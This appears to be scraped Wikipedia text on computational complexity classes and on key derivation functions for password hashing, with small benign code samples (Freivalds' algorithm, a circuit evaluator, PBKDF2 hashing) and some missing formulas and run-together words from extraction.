Reductions motivate the concept of a problem being hard for a complexity class. A problem X is hard for a class of problems C if every problem in C can be polynomial-time reduced to X. Thus no problem in C is harder than X, since an algorithm for X allows us to solve any problem in C with at most polynomial slowdown. Of particular importance, the set of problems that are hard for NP is called the set of NP-hard problems.

If a problem X is hard for C and is also in C, then X is said to be complete for C. This means that X is the hardest problem in C (since there could be many problems that are equally hard, more precisely X is as hard as the hardest problems in C). Of particular importance is the class of NP-complete problems, the most difficult problems in NP. Because all problems in NP can be polynomial-time reduced to NP-complete problems, finding an NP-complete problem that can be solved in polynomial time would mean that P = NP.

Savitch's theorem establishes the relationship between deterministic and nondeterministic space resources. It shows that if a nondeterministic Turing machine can solve a problem using f(n) space, then a deterministic Turing machine can solve the same problem in f(n)^2 space, i.e. in the square of the space. Formally, Savitch's theorem states that for any f(n) > n,[14]

Important corollaries of Savitch's theorem are that PSPACE = NPSPACE (since the square of a polynomial is still a polynomial) and EXPSPACE = NEXPSPACE (since the square of an exponential is still an exponential). These relationships answer fundamental questions about the power of nondeterminism compared to determinism. Specifically, Savitch's theorem shows that any problem that a nondeterministic Turing machine can solve in polynomial space, a deterministic Turing machine can also solve in polynomial space. Similarly, any problem that a nondeterministic Turing machine can solve in exponential space, a deterministic Turing machine can also solve in exponential space.

By definition of DTIME, it follows that DTIME(n^k1) is contained in DTIME(n^k2) if k1 ≤ k2, since O(n^k1) ⊆ O(n^k2) if k1 ≤ k2. However, this definition gives no indication of whether this inclusion is strict. For time and space requirements, the conditions under which the inclusion is strict are given by the time and space hierarchy theorems, respectively. They are called hierarchy theorems because they induce a proper hierarchy on the classes defined by constraining the respective resources. The hierarchy theorems enable one to make quantitative statements about how much additional time or space is needed in order to increase the number of problems that can be solved. The time hierarchy theorem states that

The space hierarchy theorem states that

The time and space hierarchy theorems form the basis for most separation results of complexity classes. For instance, the time hierarchy theorem establishes that P is strictly contained in EXPTIME, and the space hierarchy theorem establishes that L is strictly contained in PSPACE.

While deterministic and nondeterministic Turing machines are the most commonly used models of computation, many complexity classes are defined in terms of other computational models.
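For reference, the theorem statements referred to above are usually given roughly as follows (a sketch of the standard formulations; the usual constructibility conditions on f are assumed):

```latex
% Savitch's theorem (stated above for f(n) > n):
\mathsf{NSPACE}\!\left(f(n)\right) \subseteq \mathsf{DSPACE}\!\left(f(n)^{2}\right).

% Time hierarchy theorem (f time-constructible):
\mathsf{DTIME}\!\left(o\!\left(\tfrac{f(n)}{\log f(n)}\right)\right) \subsetneq \mathsf{DTIME}\!\left(f(n)\right).

% Space hierarchy theorem (f space-constructible):
\mathsf{DSPACE}\!\left(o\!\left(f(n)\right)\right) \subsetneq \mathsf{DSPACE}\!\left(f(n)\right).
```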
In particular, many complexity classes are defined using probabilistic Turing machines, interactive proof systems, Boolean circuits, and quantum Turing machines. These are explained in greater detail below.

A number of important complexity classes are defined using the probabilistic Turing machine, a variant of the Turing machine that can toss random coins. These classes help to better describe the complexity of randomized algorithms. A probabilistic Turing machine is similar to a deterministic Turing machine, except rather than following a single transition function (a set of rules for how to proceed at each step of the computation) it probabilistically selects between multiple transition functions at each step. The standard definition of a probabilistic Turing machine specifies two transition functions, so that the selection of transition function at each step resembles a coin flip. The randomness introduced at each step of the computation introduces the potential for error; that is, strings that the Turing machine is meant to accept may on some occasions be rejected and strings that the Turing machine is meant to reject may on some occasions be accepted. As a result, the complexity classes based on the probabilistic Turing machine are defined in large part around the amount of error that is allowed. Formally, they are defined using an error probability ε: a probabilistic Turing machine M is said to recognize a language L with error probability ε if it accepts every string in L with probability at least 1 − ε and rejects every string not in L with probability at least 1 − ε.

The fundamental randomized time complexity classes are ZPP, RP, co-RP, BPP, and PP. The strictest class is ZPP (zero-error probabilistic polynomial time), the class of problems solvable in polynomial time by a probabilistic Turing machine with error probability 0. Intuitively, this is the strictest class of probabilistic problems because it demands no error whatsoever.

A slightly looser class is RP (randomized polynomial time), which maintains no error for strings not in the language but allows bounded error for strings in the language. More formally, a language is in RP if there is a probabilistic polynomial-time Turing machine M such that if a string is not in the language then M always rejects, and if a string is in the language then M accepts with probability at least 1/2. The class co-RP is similarly defined except the roles are flipped: error is not allowed for strings in the language but is allowed for strings not in the language. Taken together, the classes RP and co-RP encompass all of the problems that can be solved by probabilistic Turing machines with one-sided error.

Loosening the error requirements further to allow for two-sided error yields the class BPP (bounded-error probabilistic polynomial time), the class of problems solvable in polynomial time by a probabilistic Turing machine with error probability less than 1/3 (for both strings in the language and not in the language). BPP is the most practically relevant of the probabilistic complexity classes: problems in BPP have efficient randomized algorithms that can be run quickly on real computers. BPP is also at the center of the important unsolved problem in computer science over whether P = BPP, which if true would mean that randomness does not increase the computational power of computers, i.e. any probabilistic Turing machine could be simulated by a deterministic Turing machine with at most polynomial slowdown.
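As one concrete example of the kind of efficient randomized algorithm discussed above, here is a sketch of Freivalds' algorithm for checking a matrix product. It has one-sided error: when A·B = C it always accepts, and otherwise each round rejects with probability at least 1/2, so the overall error is at most 2^-rounds. The pure-Python matrix representation is an illustrative choice.

```python
# Freivalds' algorithm (sketch): randomized verification that A*B = C.
import random

def mat_vec(m, v):
    return [sum(row[j] * v[j] for j in range(len(v))) for row in m]

def freivalds(a, b, c, rounds=20):
    n = len(a)
    for _ in range(rounds):
        x = [random.randint(0, 1) for _ in range(n)]       # random 0/1 vector
        if mat_vec(a, mat_vec(b, x)) != mat_vec(c, x):      # compare A(Bx) with Cx
            return False                                     # definitely A*B != C
    return True          # probably A*B = C (error probability <= 2**-rounds)

A = [[2, 3], [3, 4]]
B = [[1, 0], [1, 2]]
C_ok  = [[5, 6], [7, 8]]      # the correct product
C_bad = [[5, 6], [7, 9]]      # wrong in one entry
print(freivalds(A, B, C_ok), freivalds(A, B, C_bad))   # True False (with high probability)
```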
The broadest class of efficiently solvable probabilistic problems is PP (probabilistic polynomial time), the set of languages solvable by a probabilistic Turing machine in polynomial time with an error probability of less than 1/2 for all strings.

ZPP, RP and co-RP are all subsets of BPP, which in turn is a subset of PP. The reason for this is intuitive: the classes allowing zero error and only one-sided error are all contained within the class that allows two-sided error, and PP simply relaxes the error probability of BPP. ZPP relates to RP and co-RP in the following way: ZPP = RP ∩ co-RP. That is, ZPP consists exactly of those problems that are in both RP and co-RP. Intuitively, this follows from the fact that RP and co-RP allow only one-sided error: co-RP does not allow error for strings in the language and RP does not allow error for strings not in the language. Hence, if a problem is in both RP and co-RP, then there must be no error for strings both in and not in the language (i.e. no error whatsoever), which is exactly the definition of ZPP.

Important randomized space complexity classes include BPL, RL, and RLP.

A number of complexity classes are defined using interactive proof systems. Interactive proofs generalize the proofs definition of the complexity class NP and yield insights into cryptography, approximation algorithms, and formal verification.

Interactive proof systems are abstract machines that model computation as the exchange of messages between two parties: a prover P and a verifier V. The parties interact by exchanging messages, and an input string is accepted by the system if the verifier decides to accept the input on the basis of the messages it has received from the prover. The prover P has unlimited computational power while the verifier has bounded computational power (the standard definition of interactive proof systems defines the verifier to be polynomial-time bounded). The prover, however, is untrustworthy (this prevents all languages from being trivially recognized by the proof system by having the computationally unbounded prover solve for whether a string is in a language and then sending a trustworthy "YES" or "NO" to the verifier), so the verifier must conduct an "interrogation" of the prover by "asking it" successive rounds of questions, accepting only if it develops a high degree of confidence that the string is in the language.[15]

The class NP is a simple proof system in which the verifier is restricted to being a deterministic polynomial-time Turing machine and the procedure is restricted to one round (that is, the prover sends only a single, full proof, typically referred to as the certificate, to the verifier). Put another way, the definition of the class NP (the set of decision problems for which the problem instances, when the answer is "YES", have proofs verifiable in polynomial time by a deterministic Turing machine) describes a proof system in which the proof is constructed by an unmentioned prover and the deterministic Turing machine is the verifier. For this reason, NP can also be called dIP (deterministic interactive proof), though it is rarely referred to as such. It turns out that NP captures the full power of interactive proof systems with deterministic (polynomial-time) verifiers, because it can be shown that for any proof system with a deterministic verifier it is never necessary to exchange more than a single round of messages between the prover and the verifier.
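For reference, the acceptance conditions of the randomized classes summarized above are usually stated roughly as follows (a sketch; M denotes a probabilistic polynomial-time Turing machine and w an input string):

```latex
\begin{align*}
L \in \mathsf{RP} &: \quad w \in L \Rightarrow \Pr[M \text{ accepts } w] \geq \tfrac{1}{2},
  \qquad w \notin L \Rightarrow \Pr[M \text{ accepts } w] = 0\\
L \in \mathsf{co\text{-}RP} &: \quad w \in L \Rightarrow \Pr[M \text{ accepts } w] = 1,
  \qquad w \notin L \Rightarrow \Pr[M \text{ accepts } w] \leq \tfrac{1}{2}\\
L \in \mathsf{BPP} &: \quad w \in L \Rightarrow \Pr[M \text{ accepts } w] \geq \tfrac{2}{3},
  \qquad w \notin L \Rightarrow \Pr[M \text{ accepts } w] \leq \tfrac{1}{3}\\
L \in \mathsf{PP} &: \quad w \in L \Rightarrow \Pr[M \text{ accepts } w] > \tfrac{1}{2},
  \qquad w \notin L \Rightarrow \Pr[M \text{ rejects } w] > \tfrac{1}{2}\\
\mathsf{ZPP} &= \mathsf{RP} \cap \mathsf{co\text{-}RP}
\end{align*}
```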
Interactive proof systems that provide greater computational power than standard complexity classes thus require probabilistic verifiers, which means that the verifier's questions to the prover are computed using probabilistic algorithms. As noted in the section above on randomized computation, probabilistic algorithms introduce error into the system, so complexity classes based on probabilistic proof systems are defined in terms of an error probability ε. The most general complexity class arising out of this characterization is the class IP (interactive polynomial time), which is the class of all problems solvable by an interactive proof system (P, V), where V is probabilistic polynomial-time and the proof system satisfies two properties for a language L ∈ IP: completeness (if a string is in L, then some prover strategy makes the verifier accept it with high probability) and soundness (if a string is not in L, then no prover strategy can make the verifier accept it except with small probability).

An important feature of IP is that it equals PSPACE. In other words, any problem that can be solved by a polynomial-time interactive proof system can also be solved by a deterministic Turing machine with polynomial space resources, and vice versa.

A modification of the protocol for IP produces another important complexity class: AM (Arthur–Merlin protocol). In the definition of interactive proof systems used by IP, the prover was not able to see the coins utilized by the verifier in its probabilistic computation; it was only able to see the messages that the verifier produced with these coins. For this reason, the coins are called private random coins. The interactive proof system can be constrained so that the coins used by the verifier are public random coins; that is, the prover is able to see the coins. Formally, AM is defined as the class of languages with an interactive proof in which the verifier sends a random string to the prover, the prover responds with a message, and the verifier either accepts or rejects by applying a deterministic polynomial-time function to the message from the prover. AM can be generalized to AM[k], where k is the number of messages exchanged (so in the generalized form the standard AM defined above is AM[2]). However, it is the case that for all k ≥ 2, AM[k] = AM[2]. It is also the case that AM[k] ⊆ IP[k].

Other complexity classes defined using interactive proof systems include MIP (multiprover interactive polynomial time) and QIP (quantum interactive polynomial time).

An alternative model of computation to the Turing machine is the Boolean circuit, a simplified model of the digital circuits used in modern computers. Not only does this model provide an intuitive connection between computation in theory and computation in practice, but it is also a natural model for non-uniform computation (computation in which different input sizes within the same problem use different algorithms).

Formally, a Boolean circuit C is a directed acyclic graph in which edges represent wires (which carry the bit values 0 and 1), the input bits are represented by source vertices (vertices with no incoming edges), and all non-source vertices represent logic gates (generally the AND, OR, and NOT gates). One logic gate is designated the output gate, and represents the end of the computation.
The input/output behavior of a circuit C with n input variables is represented by the Boolean function f_C : {0,1}^n → {0,1}; for example, on input bits x_1, x_2, ..., x_n, the output bit b of the circuit is represented mathematically as b = f_C(x_1, x_2, ..., x_n). The circuit C is said to compute the Boolean function f_C.

Any particular circuit has a fixed number of input vertices, so it can only act on inputs of that size. Languages (the formal representations of decision problems), however, contain strings of differing lengths, so languages cannot be fully captured by a single circuit (this contrasts with the Turing machine model, in which a language is fully described by a single Turing machine that can act on any input size). A language is thus represented by a circuit family. A circuit family is an infinite list of circuits (C_0, C_1, C_2, ...), where C_n is a circuit with n input variables. A circuit family is said to decide a language L if, for every string w, w is in the language L if and only if C_n(w) = 1, where n is the length of w. In other words, a string w of size n is in the language represented by the circuit family (C_0, C_1, C_2, ...) if the circuit C_n (the circuit with the same number of input vertices as the number of bits in w) evaluates to 1 when w is its input.

While complexity classes defined using Turing machines are described in terms of time complexity, circuit complexity classes are defined in terms of circuit size, the number of vertices in the circuit. The size complexity of a circuit family (C_0, C_1, C_2, ...) is the function f : ℕ → ℕ, where f(n) is the circuit size of C_n. The familiar function classes follow naturally from this; for example, a polynomial-size circuit family is one such that the function f is a polynomial.

The complexity class P/poly is the set of languages that are decidable by polynomial-size circuit families. It turns out that there is a natural connection between circuit complexity and time complexity. Intuitively, a language with small time complexity (that is, one that requires relatively few sequential operations on a Turing machine) also has a small circuit complexity (that is, it requires relatively few Boolean operations). Formally, it can be shown that if a language is in DTIME(t(n)), where t is a function t : ℕ → ℕ, then it has circuit complexity O(t^2(n)).[16] It follows directly from this fact that P ⊆ P/poly. In other words, any problem that can be solved in polynomial time by a deterministic Turing machine can also be solved by a polynomial-size circuit family. It is further the case that the inclusion is proper, i.e. P ⊊ P/poly (for example, there are some undecidable problems that are in P/poly).
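A tiny sketch of a Boolean circuit represented as a DAG and evaluated gate by gate may help make this concrete. The dictionary-based gate encoding and the XOR example are illustrative assumptions, not a standard interface.

```python
# A minimal Boolean circuit sketch: gates form a DAG and are evaluated
# recursively with memoization, from the designated output gate downward.
def evaluate_circuit(gates, output, inputs):
    """gates: name -> ("INPUT", index) or (op, operand names)."""
    cache = {}
    def value(name):
        if name in cache:
            return cache[name]
        kind, *args = gates[name]
        if kind == "INPUT":
            result = inputs[args[0]]
        elif kind == "NOT":
            result = 1 - value(args[0])
        elif kind == "AND":
            result = min(value(a) for a in args)
        elif kind == "OR":
            result = max(value(a) for a in args)
        cache[name] = result
        return result
    return value(output)

# A circuit computing XOR of two input bits: (x0 OR x1) AND NOT(x0 AND x1).
xor_circuit = {
    "x0": ("INPUT", 0), "x1": ("INPUT", 1),
    "or":   ("OR", "x0", "x1"),
    "and":  ("AND", "x0", "x1"),
    "nand": ("NOT", "and"),
    "out":  ("AND", "or", "nand"),
}
print([evaluate_circuit(xor_circuit, "out", bits)
       for bits in ((0, 0), (0, 1), (1, 0), (1, 1))])   # [0, 1, 1, 0]
```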
P/poly has a number of properties that make it highly useful in the study of the relationships between complexity classes. In particular, it is helpful in investigating problems related to P versus NP. For example, if there is any language in NP that is not in P/poly, then P ≠ NP.[17] P/poly is also helpful in investigating properties of the polynomial hierarchy. For example, if NP ⊆ P/poly, then PH collapses to Σ₂^P. A full description of the relations between P/poly and other complexity classes is available at "Importance of P/poly". P/poly is also helpful in the general study of the properties of Turing machines, as the class can be equivalently defined as the class of languages recognized by a polynomial-time Turing machine with a polynomial-bounded advice function.

Two subclasses of P/poly that have interesting properties in their own right are NC and AC. These classes are defined not only in terms of their circuit size but also in terms of their depth. The depth of a circuit is the length of the longest directed path from an input node to the output node. The class NC is the set of languages that can be solved by circuit families that are restricted not only to having polynomial size but also to having polylogarithmic depth. The class AC is defined similarly to NC, except that gates are allowed to have unbounded fan-in (that is, the AND and OR gates can be applied to more than two bits). NC is a notable class because it can be equivalently defined as the class of languages that have efficient parallel algorithms.

The classes BQP and QMA, which are of key importance in quantum information science, are defined using quantum Turing machines.

While most complexity classes studied by computer scientists are sets of decision problems, there are also a number of complexity classes defined in terms of other types of problems. In particular, there are complexity classes consisting of counting problems, function problems, and promise problems. These are explained in greater detail below.

A counting problem asks not only whether a solution exists (as with a decision problem), but asks how many solutions exist.[18] For example, the decision problem CYCLE asks whether a particular graph G has a simple cycle (the answer is a simple yes/no); the corresponding counting problem #CYCLE (pronounced "sharp cycle") asks how many simple cycles G has.[19] The output to a counting problem is thus a number, in contrast to the output for a decision problem, which is a simple yes/no (or accept/reject, 0/1, or other equivalent scheme).[20]

Thus, whereas decision problems are represented mathematically as formal languages, counting problems are represented mathematically as functions: a counting problem is formalized as the function f : {0,1}* → ℕ such that for every input w ∈ {0,1}*, f(w) is the number of solutions. For example, in the #CYCLE problem, the input is a graph G ∈ {0,1}* (a graph represented as a string of bits) and f(G) is the number of simple cycles in G.
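As a toy illustration of the contrast between CYCLE and #CYCLE described above, the following sketch brute-forces both on a small directed graph. The directed-graph encoding and the anchoring convention (counting each cycle once at its smallest vertex) are illustrative choices.

```python
# Counting versus deciding: #CYCLE and CYCLE on a tiny directed graph.
def count_simple_cycles(graph):
    """Count directed simple cycles, each counted once, anchored at its
    smallest vertex. Exponential-time brute force, fine for tiny graphs."""
    count = 0
    def dfs(start, node, visited):
        nonlocal count
        for nxt in graph[node]:
            if nxt == start:
                count += 1                            # closed a simple cycle
            elif nxt > start and nxt not in visited:
                dfs(start, nxt, visited | {nxt})
    for start in graph:
        dfs(start, start, {start})
    return count

def has_simple_cycle(graph):                           # the decision version
    return count_simple_cycles(graph) > 0

g = {0: [1], 1: [2], 2: [0, 1], 3: []}                 # cycles: 0->1->2->0 and 1->2->1
print(count_simple_cycles(g), has_simple_cycle(g))     # 2 True
```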
Counting problems arise in a number of fields, including statistical estimation, statistical physics, network design, and economics.[21]

#P (pronounced "sharp P") is an important class of counting problems that can be thought of as the counting version of NP.[22] The connection to NP arises from the fact that the number of solutions to a problem equals the number of accepting branches in a nondeterministic Turing machine's computation tree. #P is thus formally defined as follows:

And just as NP can be defined both in terms of nondeterminism and in terms of a verifier (i.e. as an interactive proof system), so too can #P be equivalently defined in terms of a verifier. Recall that a decision problem is in NP if there exists a polynomial-time checkable certificate to a given problem instance; that is, NP asks whether there exists a proof of membership (a certificate) for the input that can be checked for correctness in polynomial time. The class #P asks how many such certificates exist.[22] In this context, #P is defined as follows:

Counting problems are a subset of a broader class of problems called function problems. A function problem is a type of problem in which the values of a function f : A → B are computed. Formally, a function problem f is defined as a relation R over strings of an arbitrary alphabet Σ:

An algorithm solves f if for every input x such that there exists a y satisfying (x, y) ∈ R, the algorithm produces one such y. This is just another way of saying that f is a function and the algorithm solves f(x) for all x ∈ Σ*.

An important function complexity class is FP, the class of efficiently solvable functions.[23] More specifically, FP is the set of function problems that can be solved by a deterministic Turing machine in polynomial time.[23] FP can be thought of as the function problem equivalent of P. Importantly, FP provides some insight into both counting problems and P versus NP. If #P = FP, then the functions that determine the number of certificates for problems in NP are efficiently solvable. And since computing the number of certificates is at least as hard as determining whether a certificate exists, it must follow that if #P = FP then P = NP (it is not known whether this holds in the reverse, i.e. whether P = NP implies #P = FP).[23]

Just as FP is the function problem equivalent of P, FNP is the function problem equivalent of NP. Importantly, FP = FNP if and only if P = NP.[24]

Promise problems are a generalization of decision problems in which the input to a problem is guaranteed ("promised") to be from a particular subset of all possible inputs. Recall that with a decision problem L ⊆ {0,1}*, an algorithm M for L must act (correctly) on every w ∈ {0,1}*. A promise problem loosens the input requirement on M by restricting the input to some subset of {0,1}*. Specifically, a promise problem is defined as a pair of non-intersecting sets (Π_ACCEPT, Π_REJECT), where:[25]

The input to an algorithm M for a promise problem (Π_ACCEPT, Π_REJECT) is thus Π_ACCEPT ∪ Π_REJECT, which is called the promise.
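For reference, the two characterizations of #P referred to above are usually stated roughly as follows (a sketch of the standard formulations):

```latex
\begin{align*}
\#\mathsf{P} &= \{\, f \mid f(w) = \text{number of accepting branches of } N \text{ on input } w,\\
&\qquad\quad N \text{ a polynomial-time nondeterministic Turing machine} \,\}\\[4pt]
\#\mathsf{P} &= \{\, f \mid f(w) = \bigl|\{\, c \in \{0,1\}^{p(|w|)} : V(w,c)=1 \,\}\bigr|,\\
&\qquad\quad V \text{ a polynomial-time verifier and } p \text{ a polynomial} \,\}
\end{align*}
```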
Strings in Π_ACCEPT ∪ Π_REJECT are said to satisfy the promise.[25] By definition, Π_ACCEPT and Π_REJECT must be disjoint, i.e. Π_ACCEPT ∩ Π_REJECT = ∅.

Within this formulation, it can be seen that decision problems are just the subset of promise problems with the trivial promise Π_ACCEPT ∪ Π_REJECT = {0,1}*. With decision problems it is thus simpler to define the problem as only Π_ACCEPT (with Π_REJECT implicitly being {0,1}* ∖ Π_ACCEPT), which throughout this page is denoted L to emphasize that Π_ACCEPT = L is a formal language.

Promise problems make for a more natural formulation of many computational problems. For instance, a computational problem could be something like "given a planar graph, determine whether or not..."[26] This is often stated as a decision problem, where it is assumed that there is some translation schema that takes every string s ∈ {0,1}* to a planar graph. However, it is more straightforward to define this as a promise problem in which the input is promised to be a planar graph.

Promise problems provide an alternate definition for standard complexity classes of decision problems. P, for instance, can be defined as a promise problem:[27] the class of promise problems (Π_ACCEPT, Π_REJECT) for which there is a deterministic polynomial-time algorithm that accepts every string in Π_ACCEPT and rejects every string in Π_REJECT. Classes of decision problems (that is, classes of problems defined as formal languages) thus translate naturally to promise problems, where a language L in the class is simply L = Π_ACCEPT and Π_REJECT is implicitly {0,1}* ∖ Π_ACCEPT.

Formulating many basic complexity classes like P as promise problems provides little additional insight into their nature. However, there are some complexity classes for which formulating them as promise problems has been useful to computer scientists. Promise problems have, for instance, played a key role in the study of SZK (statistical zero-knowledge).[28]

The following table shows some of the classes of problems that are considered in complexity theory. If class X is a strict subset of Y, then X is shown below Y with a dark line connecting them. If X is a subset, but it is unknown whether they are equal sets, then the line is lighter and dotted. Technically, the breakdown into decidable and undecidable pertains more to the study of computability theory, but is useful for putting the complexity classes in perspective.
https://en.wikipedia.org/wiki/Complexity_class
In cryptography, a key derivation function (KDF) is a cryptographic algorithm that derives one or more secret keys from a secret value such as a master key, a password, or a passphrase using a pseudorandom function (which typically uses a cryptographic hash function or block cipher).[1][2][3] KDFs can be used to stretch keys into longer keys or to obtain keys of a required format, such as converting a group element that is the result of a Diffie–Hellman key exchange into a symmetric key for use with AES. Keyed cryptographic hash functions are popular examples of pseudorandom functions used for key derivation.[4]

The first[citation needed] deliberately slow (key stretching) password-based key derivation function was called "crypt" (or "crypt(3)" after its man page), and was invented by Robert Morris in 1978. It would encrypt a constant (zero), using the first 8 characters of the user's password as the key, by performing 25 iterations of a modified DES encryption algorithm (in which a 12-bit number read from the real-time computer clock is used to perturb the calculations). The resulting 64-bit number is encoded as 11 printable characters and then stored in the Unix password file.[5] While it was a great advance at the time, increases in processor speeds since the PDP-11 era have made brute-force attacks against crypt feasible, and advances in storage have rendered the 12-bit salt inadequate. The crypt function's design also limits the user password to 8 characters, which limits the keyspace and makes strong passphrases impossible.[citation needed]

Although high throughput is a desirable property in general-purpose hash functions, the opposite is true in password security applications, in which defending against brute-force cracking is a primary concern. The growing use of massively parallel hardware such as GPUs, FPGAs, and even ASICs for brute-force cracking has made the selection of a suitable algorithm even more critical, because a good algorithm should not only enforce a certain amount of computational cost on CPUs, but also resist the cost/performance advantages of modern massively parallel platforms for such tasks. Various algorithms have been designed specifically for this purpose, including bcrypt, scrypt and, more recently, Lyra2 and Argon2 (the latter being the winner of the Password Hashing Competition). The large-scale Ashley Madison data breach, in which roughly 36 million password hashes were stolen by attackers, illustrated the importance of algorithm selection in securing passwords. Although bcrypt was employed to protect the hashes (making large-scale brute-force cracking expensive and time-consuming), a significant portion of the accounts in the compromised data also contained a password hash based on the fast general-purpose MD5 algorithm, which made it possible for over 11 million of the passwords to be cracked in a matter of weeks.[6]

In June 2017, the U.S. National Institute of Standards and Technology (NIST) issued a new revision of its digital authentication guidelines, NIST SP 800-63B-3,[7]: 5.1.1.2 stating that: "Verifiers SHALL store memorized secrets [i.e. passwords] in a form that is resistant to offline attacks. Memorized secrets SHALL be salted and hashed using a suitable one-way key derivation function. Key derivation functions take a password, a salt, and a cost factor as inputs then generate a password hash. Their purpose is to make each password guessing trial by an attacker who has obtained a password hash file expensive and therefore the cost of a guessing attack high or prohibitive."
Modern password-based key derivation functions, such as PBKDF2,[2] are based on a recognized cryptographic hash such as SHA-2, use more salt (at least 64 bits, chosen randomly), and use a high iteration count. NIST recommends a minimum iteration count of 10,000.[7]: 5.1.1.2 "For especially critical keys, or for very powerful systems or systems where user-perceived performance is not critical, an iteration count of 10,000,000 may be appropriate."[8]: 5.2

The original use for a KDF is key derivation, the generation of keys from secret passwords or passphrases. Variations on this theme include:

Key derivation functions are also used in applications to derive keys from secret passwords or passphrases, which typically do not have the desired properties to be used directly as cryptographic keys. In such applications, it is generally recommended that the key derivation function be made deliberately slow so as to frustrate brute-force attacks or dictionary attacks on the password or passphrase input value.

Such use may be expressed as DK = KDF(key, salt, iterations), where DK is the derived key, KDF is the key derivation function, key is the original key or password, salt is a random number which acts as cryptographic salt, and iterations refers to the number of iterations of a sub-function. The derived key is used instead of the original key or password as the key to the system. The values of the salt and the number of iterations (if it is not fixed) are stored with the hashed password or sent as cleartext (unencrypted) with an encrypted message.[10]

The difficulty of a brute-force attack increases with the number of iterations. A practical limit on the iteration count is the unwillingness of users to tolerate a perceptible delay in logging into a computer or seeing a decrypted message. The use of salt prevents the attackers from precomputing a dictionary of derived keys.[10]

An alternative approach, called key strengthening, extends the key with a random salt, but then (unlike in key stretching) securely deletes the salt.[11] This forces both the attacker and legitimate users to perform a brute-force search for the salt value.[12] Although the paper that introduced key stretching[13] referred to this earlier technique and intentionally chose a different name, the term "key strengthening" is now often (arguably incorrectly) used to refer to key stretching.

Despite their original use for key derivation, KDFs are possibly better known for their use in password hashing (password verification by hash comparison), as used by the passwd file or shadow password file. Password hash functions should be relatively expensive to calculate in case of brute-force attacks, and the key stretching of KDFs happens to provide this characteristic.[citation needed] The non-secret parameters are called "salt" in this context.

In 2013 a Password Hashing Competition was announced to choose a new, standard algorithm for password hashing. On 20 July 2015 the competition ended and Argon2 was announced as the final winner. Four other algorithms received special recognition: Catena, Lyra2, Makwa and yescrypt.[14]

As of May 2023, the Open Worldwide Application Security Project (OWASP) recommends the following KDFs for password hashing, listed in order of priority:[15]
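A short sketch of the DK = KDF(key, salt, iterations) pattern described above, using the PBKDF2 implementation in Python's standard library. The iteration count, key length, and salt size here are illustrative; real deployments should follow current guidance when choosing parameters.

```python
# Password hashing and verification with PBKDF2-HMAC-SHA256 (sketch).
import hashlib, hmac, os

def hash_password(password: str, iterations: int = 600_000) -> tuple[bytes, bytes]:
    salt = os.urandom(16)                       # random salt, well over 64 bits
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations, dklen=32)
    return salt, dk                             # store salt and derived key together

def verify_password(password: str, salt: bytes, expected: bytes,
                    iterations: int = 600_000) -> bool:
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations, dklen=32)
    return hmac.compare_digest(dk, expected)    # constant-time comparison

salt, stored = hash_password("correct horse battery staple")
print(verify_password("correct horse battery staple", salt, stored))  # True
print(verify_password("wrong guess", salt, stored))                   # False
```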
https://en.wikipedia.org/wiki/Key_derivation_function
The most commonly analyzed problems in theoretical computer science aredecision problems—the kinds of problems that can be posed asyes–no questions. The primality example above, for instance, is an example of a decision problem as it can be represented by the yes–no question "is thenatural numbern{\displaystyle n}prime". In terms of the theory of computation, a decision problem is represented as the set of input strings that a computer running a correctalgorithmwould answer "yes" to. In the primality example,PRIME{\displaystyle {\texttt {PRIME}}}is the set of strings representing natural numbers that, when input into a computer running an algorithm that correctlytests for primality, the algorithm answers "yes, this number is prime". This "yes-no" format is often equivalently stated as "accept-reject"; that is, an algorithm "accepts" an input string if the answer to the decision problem is "yes" and "rejects" if the answer is "no". While some problems cannot easily be expressed as decision problems, they nonetheless encompass a broad range of computational problems.[2]Other types of problems that certain complexity classes are defined in terms of include: To make concrete the notion of a "computer", in theoretical computer science problems are analyzed in the context of acomputational model. Computational models make exact the notions of computational resources like "time" and "memory". Incomputational complexity theory, complexity classes deal with theinherentresource requirements of problems and not the resource requirements that depend upon how a physical computer is constructed. For example, in the real world different computers may require different amounts of time and memory to solve the same problem because of the way that they have been engineered. By providing an abstract mathematical representations of computers, computational models abstract away superfluous complexities of the real world (like differences inprocessorspeed) that obstruct an understanding of fundamental principles. The most commonly used computational model is theTuring machine. While other models exist and many complexity classes are defined in terms of them (see section"Other models of computation"), the Turing machine is used to define most basic complexity classes. With the Turing machine, instead of using standard units of time like the second (which make it impossible to disentangle running time from the speed of physical hardware) and standard units of memory likebytes, the notion of time is abstracted as the number of elementary steps that a Turing machine takes to solve a problem and the notion of memory is abstracted as the number of cells that are used on the machine's tape. These are explained in greater detail below. It is also possible to use theBlum axiomsto define complexity classes without referring to a concretecomputational model, but this approach is less frequently used in complexity theory. ATuring machineis a mathematical model of a general computing machine. It is the most commonly used model in complexity theory, owing in large part to the fact that it is believed to be as powerful as any other model of computation and is easy to analyze mathematically. Importantly, it is believed that if there exists an algorithm that solves a particular problem then there also exists a Turing machine that solves that same problem (this is known as theChurch–Turing thesis); this means that it is believed thateveryalgorithm can be represented as a Turing machine. 
Mechanically, a Turing machine (TM) manipulates symbols (generally restricted to the bits 0 and 1 to provide an intuitive connection to real-life computers) contained on an infinitely long strip of tape. The TM can read and write, one at a time, using a tape head. Operation is fully determined by a finite set of elementary instructions such as "in state 42, if the symbol seen is 0, write a 1; if the symbol seen is 1, change into state 17; in state 17, if the symbol seen is 0, write a 1 and change to state 6". The Turing machine starts with only the input string on its tape and blanks everywhere else. The TM accepts the input if it enters a designated accept state and rejects the input if it enters a reject state. The deterministic Turing machine (DTM) is the most basic type of Turing machine. It uses a fixed set of rules to determine its future actions (which is why it is called "deterministic"). A computational problem can then be defined in terms of a Turing machine as the set of input strings that a particular Turing machine accepts. For example, the primality problemPRIME{\displaystyle {\texttt {PRIME}}}from above is the set of strings (representing natural numbers) that a Turing machine running an algorithm that correctlytests for primalityaccepts. A Turing machine is said torecognizea language (recall that "problem" and "language" are largely synonymous in computability and complexity theory) if it accepts all inputs that are in the language and is said todecidea language if it additionally rejects all inputs that are not in the language (certain inputs may cause a Turing machine to run forever, sodecidabilityplaces the additional constraint overrecognizabilitythat the Turing machine must halt on all inputs). A Turing machine that "solves" a problem is generally meant to mean one that decides the language. Turing machines enable intuitive notions of "time" and "space". Thetime complexityof a TM on a particular input is the number of elementary steps that the Turing machine takes to reach either an accept or reject state. Thespace complexityis the number of cells on its tape that it uses to reach either an accept or reject state. The deterministic Turing machine (DTM) is a variant of the nondeterministic Turing machine (NTM). Intuitively, an NTM is just a regular Turing machine that has the added capability of being able to explore multiple possible future 